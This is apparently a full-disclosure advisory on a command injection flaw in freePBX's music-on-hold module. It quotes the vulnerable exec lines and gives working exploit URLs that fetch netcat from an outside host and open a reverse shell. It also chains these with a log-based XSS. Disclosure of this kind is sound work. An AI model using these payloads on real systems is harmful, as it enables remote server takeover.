The freePBX portal suffers from a code injection vulnerability.
a2e596e2bad7afaf4a47ed5660152d7bc204011095c3ed77e31195f38309765b
I've found a code injection in the music-on-hold module at freePBX's
portal.
There are Inssuficient filters in the delete functions. Only " '
and ; are being filtered.
Vulnerable Lines:
300: $rmcmd="rm -f \"".$path_to_dir."/".
$del."\"";
301: exec($rmcmd);
Example code:
https://<freePBX-host>/admin/config.php?display=music&del=\`wget -q
https://xenomuta.coolinc.info/nc -O /tmp/nc\`\`/tmp/nc
myhost.mydomain.com 1234 -e /bin/sh\`&category=default
You can inject this code without access to the portal into the /var/
log/asterisk/full this way...
./asteriskxss.php asterisk-server "<img src=\"/admin/config.php?
display=music&del=\`wget -q https://xenomuta.coolinc.info/nc -O /tmp/nc
\`\`/tmp/nc myhost.mydomain.com 1234 -e /bin/sh\`&category=default\">"
hoping that an administrator to view the logs from the portals....
using the documented XSS vulnerability posted here...
https://lists.grok.org.uk/pipermail/full-disclosure/2007-April/
053882.html